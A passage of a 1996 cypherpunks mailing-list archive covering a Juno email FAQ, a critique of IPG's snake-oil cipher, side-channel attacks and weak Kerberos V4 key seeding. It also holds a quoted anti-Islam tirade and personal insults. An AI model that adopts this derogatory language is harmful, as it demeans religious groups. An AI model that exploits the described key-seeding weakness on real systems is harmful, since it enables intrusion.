Yes.  There are no monthly charges to use the service, no set-up fees, no
per-message fees, and no hourly charges. You will be able to download the
software off the Internet (or get it in a variety of other ways). 

3) WHAT ABOUT PHONE CHARGES?

It won't be necessary to dial a long-distance telephone number to reach us.
We expect that ultimately the bulk of our users will dial into local access
numbers we provide; we may also use toll-free numbers to supplement our
coverage in some areas where local access numbers are not available.

Also, note that when you use Juno, you are only connected by telephone to
our central computers while you are in the process of uploading and
downloading your new mail.  When you're reading and writing your mail, you
are offline.  This means that the phone calls you do make are likely to be
very short -- under one minute, in most cases.

[*** All we need to do is figgure out their data structures for storing 
email and we're set to write something to process it. ***]

<SNIPPAGE ABOUT HARDWARE SPEX>

7) WILL JUNO GIVE ME ACCESS TO THE INTERNET?

Yes.  Your messages will go out over the Internet, meaning that you will be
able to send mail to and receive mail from anyone on the Internet or any of
the commercial online services (such as America Online, CompuServe, and
Prodigy).  However, your computer will not be connected *directly* to the
Internet.  Your computer will be connected to our central computers, and
our computers will be connected to the Internet.

8) DO I NEED TO HAVE INTERNET ACCESS FROM ANOTHER SOURCE TO USE JUNO?

No.  Juno gives you everything you need to send and receive e-mail over the
Internet.

<*** Here's the strings ****>

9) WHAT WILL THE ADVERTISING BE LIKE?

One of the major reasons that we are able to provide you with e-mail for
free is that Juno will carry advertising.  (It's the same model that's used
by radio and television.)  However, it is our hope (and plan) to make the
advertising we carry be of greater interest and value to you, and less of a
nuisance, than the advertising you are so often bombarded with over other
media.

Each Juno user will fill out a "member profile" that will help us determine
which advertisements to send to that user, what new services he or she
might be most interested in hearing about, and what other sorts of
information he or she might find useful.  Our goal is to provide users with
information that interests them and is relevant to their needs.

The advertisements on Juno may take several forms; we don't know yet what
all of them will be.  Some ads will appear as interactive banners in the
horizontal "Sponsor's Panel" at the upper right-hand corner of the screen.
If you are interested in a product you see featured in this space, you
will be able to click on the advertisement to request additional
information. Other ads might appear while you are in the process of
uploading and downloading your mail; still others might take the form of
e-mail messages that arrive in your Inbox. (Never more than one or two of
the latter in a given session, though, since getting a mailbox full of
commercial e-mail messages would be very annoying. In most sessions you'll
probably get none.) We plan to experiment with a variety of different
approaches and figure out, by looking at people's responses, what works
best. 

<More snippage>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Thu, 22 Feb 1996 22:53:22 +0800
To: John Young <jya@pipeline.com>
Subject: XON_rot
In-Reply-To: <199602211919.OAA05834@pipe4.nyc.pipeline.com>
Message-ID: <Pine.LNX.3.91.960221182657.27629A-100000@teeny.molehill.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Feb 1996, John Young wrote:

>    Computerworld, February 19, 1996:
> 
>    Internet Privacy: How far should federal regulation go?
> 
>    "Only The Force of Law Can Deter Pornographers." by Sen.
>    Jim Exon
> 
>       Don't let opponents of CDA fool you: Nothing in it
>       applies to constitutionally protected speech between
>       consenting adults. Opponents forsake reason when they
>       say they want to protect children from indecency,
>       seduction and harassment but maintain that the
>       overriding issue is freedom of access to anything by
>       anybody. There is too much of the self-serving
>       philosophy of the hands-off elite.
> 
>    "The 'Net Doesn't Need Thought Police." by Marc Rotenberg
> 
>       The U.S. is getting drawn into this craziness because
>       religious zealots and their allies in Congress have
>       decided they know what is good for us and our children.
>       CDA gives federal investigators the right to comb
>       through Web sites, newsgroup posts and even private
>       electronic mail to find evidence of indecent speech. The
>       bill even threatens the right to use privacy
>       technologies, such as encryption, because the government
>       now will have the right to open private E-mail if it
>       suspects the message contains offensive language.
> 
>    XON_rot
> 
>    [Thanks to BC for these]
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 23 Feb 1996 08:57:44 +0800
To: tighe@spectrum.titan.com
Subject: Re: Schneier Attacks
Message-ID: <199602212337.SAA27146@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by tighe@spectrum.titan.com (Mike Tighe) on 
Wed, 21 Feb  4:17 PM


>You could also count the number of electrons, as well 
>as their direction  across the chips.


True, Bruce eggs-on the credulous SciAm reporter:


"Is the timing attack a real threat to security? 'Oh, God, 
yes!' exclaims Bruce Schneier. 'You can't belittle the realness 
of it. It's not only a theoretical attack -- you can do this!' 
"


And a current IBM ad exclaims! that one of its scientists can 
dematerialize objects for transmission over the Internet with 
rematerialization at the other end! And that this technology 
will transform the world of information!


Here comes IPO Photon-optical!!!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Thu, 22 Feb 1996 15:48:45 +0800
To: cypherpunks@toad.com
Subject: Re: Fuck Islam and the Apologists Cluttering Up this List with Defenses of It
Message-ID: <199602212358.SAA25640@pipe10.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 19, 1996 18:52:04, 'tcmay@got.net (Timothy C. May)' wrote: 
 
 
> 
>Please don't send me separate copies (in addition to what is sent to the 
>IslamPunks mailing list) of this Muslim crap....it's bad enough seeing the

>pro-Muslim apologists explaining why the Word of Allah (hollow be his
name) 
>is more liberating than any decadent, Western system can be, about how 
>women are more free under Islam because they have the freedom to be 
>obedient to the will of her husband and Allah (hollow be his name), the 
>freedom to be beaten with sticks if they show their face in public, and
the 
>freedom to have their devil organs removed. 
> 
 
I must have missed these e-messages when they were oriignally posted. 
 
Could you send me pointers to the messages to which you refer? 
 
Thanks. 
 
--tallpaul 
"I'm voting for Forbes. He's only wrong about one thing."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Thu, 22 Feb 1996 22:48:34 +0800
To: cypherpunks@toad.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <199602220305.TAA08725@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales wrote:
> running fakers like us out of business should be its own reward

On the contrary: it's a voluntary waste of time, for which there seems
to be an unending supply of fodder.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Thu, 22 Feb 1996 20:06:04 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221141844.3814B-100000@citrine.cyberstation.net>
Message-ID: <Pine.OSF.3.91.960221190104.18731A-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Feb 1996, IPG Sales wrote:

> We are reconsidering the Canadian restrictions - and may change them -
> it is certainly not the ITAR quexstion, but another matter - we expect 
                                          ^^^^^^^^^^^^^^^^^^
> that Canadians will be included shortly - as to the question of using 

Just what is this 'other matter'


> Why do you want to make it a one way street? We believe fair is fair - if 
> you want to chop off our neck, then we should be able to tell people that 
> you tried and could not at some point in time - 

	I fail to see how this is a 'one way street'. You are interested
in feedback on your system and want us to examine it and tell you of
weaknesses. We are interested in any new system that claims to be secure
and we can learn from the developments, and yes, mistakes of others.  This
sounds like a perfect quid pro quo to me. 
	You seem to want more. You want to be able to use the 'name' of
the cypherpunks to assist your marketing for whatever benefits that you
see by exploiting our name. I say again, as others have said, we are
simply a mailing list of people brought together by a common interest in
cryptography. There is nothing to stop you from making your claims 
without our 'consent' or the 'Cypherpunks seal of approval'.
	The real problem that you have, is that there are knowledgable
people on this list who have expressed doubts about your system. These
people are well known to the press and in the security community and are
not shy about expressing their opinions (right Perry? <G>). These are the
people who you have to convince if you want to have our approval (whatever
that is).
	Look at the history of algorithms that are generally considered 
secure. The code has been placed on the net for public comment and 
review. I think that all have benefited from this process.
	You have made the same mistake as some others who posted long 
samples of marketing 'noise' to the list using all of the keywords that 
we have come to regard as 'snake oil'. I have no idea if your product is 
indeed secure or snake oil. You have not published enough information for 
any reasonable  person to make a determination. The form of your 
announcement was not appropriate for this forum or your needs.
	I submit that a better approach would have been to post the code
to sci.crypt and send a short note to this list asking for comments. 
People who ask for help, and co-operate with us usually receive help. 
People who publish marketing junk, as you did, get abused.
	Let's concentrate on substance rather than form.

Regards,
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@obscura.obscura.com (Mixmaster)
Date: Fri, 23 Feb 1996 08:57:56 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602220450.UAA30737@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales <ipgsales@cyberstation.net> wrote:
>
>We fess up - we are pig farmers from TexasL, we never have been to 
>these high fluting things you call schools, so we do not even 
>know what you are talking about, much less anything about Cryptography.

This explains your spelling skills, which a number of people have
already pointed out. TexasL, whatever it is, might offer something
called a highschool "GED." You should look into it.

>On Wed, 21 Feb 1996, Arley Carter wrote:
>
>> On Tue, 20 Feb 1996, IPG Sales wrote:
>> 
>> Fess up guys. You are either:
>> 
>> 1.  A team of undergrads or graduate students conducting an "exploit". 

My money's on this one, I hear that Ann Landers gets these all the time.

>> 2.  A Detweiller tentacle. Dr. FC ?

"Vlad" does seem a bit low on his medication, lately. Dr. Fred has been
pretty quiet as well. You don't suppose the two of them got together...

>> 3.  The return of Alice D'nonymous ?

Gawd! Please, don't give him any ideas!!

>> 4.  The reason the coderpunks lists was started.

Possibly, but did you notice how quickly "IPG Sales" found this list?

>>
>> > 
<huge blank space elided>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 22 Feb 1996 15:28:49 +0800
To: cypherpunks@toad.com
Subject: Re: IBM Breakthrough?
In-Reply-To: <199602220244.VAA12908@pipe1.nyc.pipeline.com>
Message-ID: <199602220503.VAA24389@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young <jya@pipeline.com> writes:

 > IBM has an ad in the Feb 26 New Yorker where a joker e-
 > mails a recipe-swapping friend in Osaka that "I'll teleport
 > you some goulash." The text then states:

 > Margit is a little premature, but we are working on it.

 > An IBM scientist and his colleagues have discovered a way to
 > make an object disintegrate in one place and reappear intact
 > in another.

 > It sounds like magic. But their breakthrough could affect
 > everything from the future of computers to our knowledge of
 > the cosmos.

 > What is this breakthrough or is it just a chump tease?

The ad overstates the result a bit. :)

You may recall, a few years back, that there was some interest in
the possibility that the non-local collapse of a quantum
mechanical wave function could be used to transmit information in
violation of causality, that is, faster than the speed of light.

The central idea was this.  You generate a system consisting of
two things whose wavefunctions are correlated, and after they
have separated some distance, you perform a measurement which
collapses the wavefunction of one of them and yields some result.
This might be the polarization of a photon, the spin of a
particle along some axis, or where on a photographic plate an ion
will strike after passing through a Stern-Gerlach device.

Since the wavefunctions are correlated, you now know the exact
same information about the twin system and have collapsed its
wavefunction non-locally without directly performing a
measurement on it.  This general notion is known as the
Einstein-Podolsky-Rosen(EPR) Effect, and measurements of
canonically conjugate variables on branch systems having a
spacelike separation give a unique result according to Quantum
Mechanics which is distinct from the classical case and which
requires this superluminal transmission of wavefunction
information.

Now actually building an apparatus which does such a thing is
tricky, since light moves pretty fast, but a few years back, this
result was experimentally confirmed with a device that produced
photons with correlated spins moving in opposite directions, and
managed to make measurements that were instantaneous enough to be
spacelike in separation.

Unfortunately, the scientists found that there was no way to use
the EPR Effect to transmit information, since although the
measurements made had a correlation, you needed the information
from the original system to decode the output of the other in a
meaningful way.

Now on to IBM's result.  Although the EPR Effect cannot be used
to transmit information (read the results of measurements), it
can be used to transmit mixed quantum states, which an attempt at
measurement would destroy.  So if you haven't measured something,
and it's value is indeterminate for a system, then you can tunnel
that unmeasured something anywhere else using the EPR Effect and
measure it there.

The general method for such teleporation is as follows.  You
create an "entangled" pair of particles whose wavefunctions are
perfectly correlated and unmeasured.  One interacts with the
particle to be teleported and the other at some distance
interacts with another identical particle to which you wish to
transfer the state of the first.  Everything is arranged so that
the state of the teleported particle is destroyed by interaction
with the first of the pair of particles, and it twin, perfectly
correlated with the first and inheriting its state via the EPR
Effect, transfers that captured state to the copy.

Now this has some interesting implications.  One of the problems
with teleportation devices in Science Fiction stories is that
they allow for the creation of duplicates.  They reduce an object
to a pattern by measuring it, and then recreate it at a distance
by assembling atoms of the same types according to the
appropriate directions.  There is no theoretical reason why, once
the pattern has been saved, this process could not be repeated
multiple times.  This has implications for things like souls and
self-awareness that many people would rather not think about.

The preceeding method for teleporting mixed quantum states does
not have such a problem, since only things which have not been
measured can be transferred in such a way, and the duplicate can
only be created if the original has been destroyed.  If
consciousness is truly a phenomena involving quantum mechanical
superposition, then we need never worry about being replicated,
and the "transporter accidents" of Star Trek are forever
relagated to the realm of fiction.

In any case, it should be noted that this method works at present
only with single particles, and not with large aggregate systems
like Goulash.  Extending it to systems would appear to be an
intractable engineering problem given current technology.

Those wishing to read IBM's explanation of this new technology
may browse their Web page on Quantum Teleportation at...

  http://www.research.ibm.com/quantuminfo/teleportation/

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 22 Feb 1996 17:37:26 +0800
To: cypherpunks@toad.com
Subject: IBM Breakthrough?
Message-ID: <199602220244.VAA12908@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   IBM has an ad in the Feb 26 New Yorker where a joker e-
   mails a recipe-swapping friend in Osaka that "I'll teleport
   you some goulash." The text then states:

      Margit is a little premature, but we are working on it.

      An IBM scientist and his colleagues have discovered a
      way to make an object disintegrate in one place and
      reappear intact in another.

      It sounds like magic. But their breakthrough could
      affect everything from the future of computers to our
      knowledge of the cosmos.

   What is this breakthrough or is it just a chump tease?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Thu, 22 Feb 1996 22:51:41 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <9602211404.AA16345@alpha>
Message-ID: <199602220355.VAA10221@grendel.texas.net>
MIME-Version: 1.0
Content-Type: text/plain


IPG Sales <ipgsales@cyberstation.net> said:

IS> Mike, the keys are encrypted with an OTP that only the intended
IS> recipient can open - a special, subsystem used for that purpose
IS> only - employing the same techniquers, but entirely separate and
IS> apart from the primary user system - any inteceptor would have to
IS> break trhe system, which we claim is impossible.

	So you send not one, but two sets of one time pads out of
band?  Well, if _both_ OTP shipments are intercepted and duplicated,
what keeps the interceptor from getting the keys?

-- 
#include <disclaimer.h>                               /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 23 Feb 1996 08:54:44 +0800
To: John Young <jya@pipeline.com>
Subject: Re: DOG_lyz
In-Reply-To: <199602171804.NAA13797@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960221223553.13497D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
>    DOG_lyz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 23 Feb 1996 08:57:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "and two forms of ID"
In-Reply-To: <ad5121a01002100481f6@[205.199.118.202]>
Message-ID: <199602220351.WAA11201@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> This gets back to the familiar issue of what it is a name credential really
> means, and whether we care.

I'm sufficiently impressed with the arguments against name credentials
that Carl Ellison has made that I'm looking seriously into systems
that don't do any sort of conventional certificate binding at all...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Thu, 22 Feb 1996 22:52:08 +0800
To: cypherpunks@toad.com
Subject: Re: IPG hoax?
Message-ID: <199602220409.XAA17058@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Wink Junior wrote:
> I must admit that after the first day I've been wondering if this whole
> IPG thing isn't some kind of deep troll or early April Fool's joke.  
> anyone actually spoken on the phone with IPG or confirmed their existence
> in any way?  For the record, I'd like to state that I saw their ad [..]

Been wondering the same thing. The noise generated by this is awfully
suspicious.  It's also rather suspicious that a couple of my posts here
have mysteriously not showed up in the archives, although I've received
replies to them (but that's another issue altogether).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSvslCoZzwIn1bdtAQGomgF/ckqMkUKfMmmkkz9EoadDUYetwmZHedSY
RYSEAo/sTtXdBzgbKEEOTj20ZA7z5O72
=Ar7E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@artcom.de (Andreas Bogk)
Date: Thu, 22 Feb 1996 12:06:54 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200306.WAA11013@toxicwaste.media.mit.edu>
Message-ID: <y8a20noxpe3.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Derek" == Derek Atkins <warlord@MIT.EDU> writes:

    Derek> Actually, this statement is false.  What you have is a
    Derek> pseudo one-time pad, not a true one-time pad.  It's close,
    Derek> though.  The problem is that the means that you use to

It's not even close. A PRNG-stream can be brute-forced, even if it
uses an otherwise secure RNG. A OTP cannot.

Andreas



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMSuiMEyjTSyISdw9AQEwAgQAm74qTRVpjsmRdp0bneTzyqwb2+XCUPFh
DKkzIulI1gqqE8P4iRFJQVhulO2//aPkhDy1+QnGAKA/wms/RB4vBD5U1IcpJ7uT
70U84hPKM57qWpU3OFBTowIutR84syEf+jb3YJQM16MZm5dU3LEBA8nJRi431ttR
+fzxs+80xD4=
=wycE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 24 Feb 1996 17:30:15 +0800
To: mixmaster@obscura.obscura.com (Mixmaster)
Subject: No Subject
In-Reply-To: <199602220450.UAA30737@obscura.com>
Message-ID: <199602220512.AAA14343@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear anonymous;

IPG Sales is not subscribed to the mailing list and only receives
CCs. Your perls of wisdom have escaped their notice.

Mixmaster writes:
> IPG Sales <ipgsales@cyberstation.net> wrote:
> >
> >We fess up - we are pig farmers from TexasL, we never have been to 
> >these high fluting things you call schools, so we do not even 
> >know what you are talking about, much less anything about Cryptography.
> 
> This explains your spelling skills, which a number of people have




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 22 Feb 1996 22:46:46 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Schneier Attacks
In-Reply-To: <199602211940.OAA07616@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SV4.3.91.960222004314.17387C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I dare say that it would be easier to look over the target's shoulder 
than to accurately measure differential amounts of heat dissapaiting out 
of a chip, covertly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@artcom.de (Andreas Bogk)
Date: Thu, 22 Feb 1996 20:01:51 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960221145534.3814H-100000@citrine.cyberstation.net>
Message-ID: <y8aybpww62l.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "IPG" == IPG Sales <ipgsales@cyberstation.net> writes:

    IPG> I find less and less disagreeement with your comments - with
    IPG> one major exception - for a given message length - say 10 to
    IPG> the 500th power, a OTP seeded algorithm, a better term would
    IPG> be to call it an OTP driven algorithm, can produce the exact
    IPG> same effect as an OTP of that length - that is, the encrypted
    IPG> text can be any possible message of that length, and it is
    IPG> not possible to predict in way what the RNG generated stream
    IPG> is -

First, what you describe is commonly called a keyed RNG. Such a system
is provably less secure than an OTP, because the number of possible
plaintexts from any given ciphertext is limited by the number of
possible keys. This makes an exhaustive search of all keys possible,
because it is very unlikely that a given ciphertext decrypts to
multiple plaintexts that make sense. In contrast, with a OTP there are
as many keys as there are possible plaintexts, so any given plaintext
can be reached, making it impossible to recognize the correct
plaintext. Of course, searching the whole keyspace might be impossible
if the number of possible keys is large enough.

But there are other ways of attacking a croyptosystem besides trying
all possible keys. Your cryptosystem seems to be based on what is
called a linear congruential generator in combination whith an
RC4-like 8*8 S-box, although somewhat simpler.

I don't want to make any claim about the security of the algorithm,
but linear congruential generators can't be considered secure for any
cryptographic use. Your only chance is that the security of that
algorithm does not depend on the generator, but I doubt that.

For further reference, go out and buy "Applied Cryptography" by Bruce
Schneier.

The pseodo-code snipped describing your algorithm, for other people's
reference:

    IPG> Bi=(Bi+Ci MOD Di) Mod 256              Large prime numbers
    IPG> ENCRYPTEXTi=OTP[Bi] XOR PLAINTEXTi     Encryption
    IPG> OTP[Bi]=ENCRYPTEXTi                    Makes the OTP Dynamic

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMSu6OEyjTSyISdw9AQGKIQP+MqE5Scq99kGfLT8CdN3h9abJZNhj9qzm
rUFGsnXfdAvyRzfLz6v8FsfLHgnkgu10MG++NABFBz0I+U0iGFi8Zivkd3Ae9/6J
qOHqbGjiS4r3QN8IOLDwAW6eO6pF4Z0A/+FqLVR+zB+OZF/7TzUmgWpa8+cLWQkH
Hndr5tAVekw=
=bY+f
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andreas@artcom.de (Andreas Bogk)
Date: Fri, 23 Feb 1996 14:06:05 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Schneier Attacks
In-Reply-To: <199602211940.OAA07616@pipe4.nyc.pipeline.com>
Message-ID: <y8awx5gw5yt.fsf@horten.artcom.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "John" == John Young <jya@pipeline.com> writes:

    John>    Schneier says in a March SciAm brief on Kocher's timing
    John> attack: "In theory there are other attacks. You can measure
    John> power consumption or heat dissipation of a chip; timing is
    John> just one way."

And you could measure emissions, without even getting close to the
chip itself.

Andreas


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMSu6x0yjTSyISdw9AQHHwAP/TrNlmlJkHvojhI0F2ZXykIfXWqJOSjD3
/EqWvhM3e/l3N2OnrMelAhJDf3c/m6E823vQpwYMIRbOwdRkBgEGM/WJGyAPpLqU
n0sgNrfD0E+zq9wKCw6HorFJc/UNIz6T3A9XGTv9ymK+eWdOjMdL0HLyedTdOgmh
l74jDaRIYzg=
=aMZl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Thu, 22 Feb 1996 19:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: A Challenge (perhaps!)
Message-ID: <2.2.32.19960222104535.006945e8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>I know it doesn't exercise key technology and relies on the secrecy of the
>algorithm (which from my very limited knowledge on cryptography I think makes
>it almost doomed from the start (?))... 

Yes, it does. Without the slightest insult of any kind to your friend, the
problem is that the vast majority of "new" algorithms have actually been
invented time and time again long ago. And the vast majority of those have
been shown to have vulnerabilities. Phil Zimmerman writes about this in the
PGP docs. It is overwhelmingly likely that your friend has, no doubt with
the best of intentions, stumbled across something that has a simple flaw he
doesn't know about.

Further, secrets are hard to keep. PGP works _because of_ its publicity, not
in spite of it. When the algorithm must be kept secret, every little thing
must be watched. Just a few months ago, someone cracked the encryption on
Microsoft's Win95 registry database by taking a snapshot of the contents of
memory at a key moment. Other hacks break other efforts at secrecy.

In fact, no sensible user should trust anything to a secret algorithm. I may
not be able to tell the difference between Diffie-Hellman and Lillian
Helman...but I can go talk to those who can. If the coders and evaluators I
trust tell me there's a problem, I can go hunt up another solution. Doing
anything else buying a pig in a poke.

Now, there are a lot of not-sensible users out there. Slick marketing can
result in a bundle being made. But it's not the best way to go.

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 17:45:12 +0800
Subject: No Subject
Message-ID: <QQadzq22386.199602220941@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



>I'm sufficiently impressed with the arguments against name credentials
>that Carl Ellison has made that I'm looking seriously into systems
>that don't do any sort of conventional certificate binding at all...

... and I bet, Wei Dai's contentions to the contrary, that they'll be
*cheaper* to use than those which do certificate binding, all other things
being equal.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 17:47:56 +0800
Subject: No Subject
Message-ID: <QQadzr22552.199602220945@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> A Kerberos V4 session key is chosen by calling random() repeatedly.
> THe PRNG is seeded with srandom(time.tv_usec ^ time.tv_sec ^ p ^ n++),
> where p is a static integer set to getpid() ^ gethostid() on the first
> call and n is a static counter.
> 
> Is there any entropy here???  Most, if not all, Kerberos servers run one
> time synchronization protocol or another, which reduces the entropy to a
> few bits at most.
> 
> DEADBEAT <na5877@anon.penet.fi>

usec grainlessness typically doesn't approach anything like a usec on most
OS implimentations either.


-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 17:53:35 +0800
Subject: No Subject
Message-ID: <QQadzr22776.199602220951@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>Perry:
>
>"Stubborness and dogmatism are the surest signs of stupidity - is there
> anything more resolute and disdainful than an ass!" Montaigne
>
>You have an yellow streak down your back  infinitely wide - you may or
>may not be a physical coward but you are certainly an intellectual coward
>- you have the opportunity to save human lives, as you asserted and you
>just brushed that asside -

[etc. elided]

My personal theory is that Perry has developed a particularly nasty form of
multiple personality disorder and it is causing him to voraciously troll
himself on this list.

It's not going to be pretty, folks.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 17:57:45 +0800
Subject: No Subject
Message-ID: <QQadzr22981.199602220955@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



> An IBM scientist and his colleagues have discovered a way to
> make an object disintegrate in one place and reappear intact
> in another.

Beam me up Scotty!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 17:58:12 +0800
Subject: No Subject
Message-ID: <QQadzr22989.199602220955@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just wanted to remind y'all that this Saturday is the second quasi-monthly
Portland (OR) cypherpunks MST3K fest, key-signing, and general social event.
E-mail for further information.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEQAwUBMSwOAn3AXR8sjiylAQHoHAfRAZ0NJpB/pzmKwwRtJJygkQfE4vLQxrO3
f51RlzysBE3u7OFGnNYmy8QLXzsaclppN0ssfbFkxs13vwgiztudl9D3LkGrdw44
HgRAAV+FTuuR+nzehOc3DHQDDnPLoXh7NrS+bYfYGHv2GB8OZYpFXD5VEirJFmEj
uq7dEV4wy8+ml7BsMXxxZNwhP1ISRXvH9ODKLZnWx/6ngkFbzJBw1cvyHiuqjwRg
5HM31+HKSe5qi+Xx9ZlEfLY5d3U6HiN9cgKL+Jo301VGsZmEvIPyK0Yjyt4EUzgN
6vawqU6Kvzj76tOMe1lnUs3eSR4rUmNlaYXNRZuxy7FObqc=
=uaR5
-----END PGP SIGNATURE-----

-- 
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 22 Feb 1996 18:18:53 +0800
Subject: No Subject
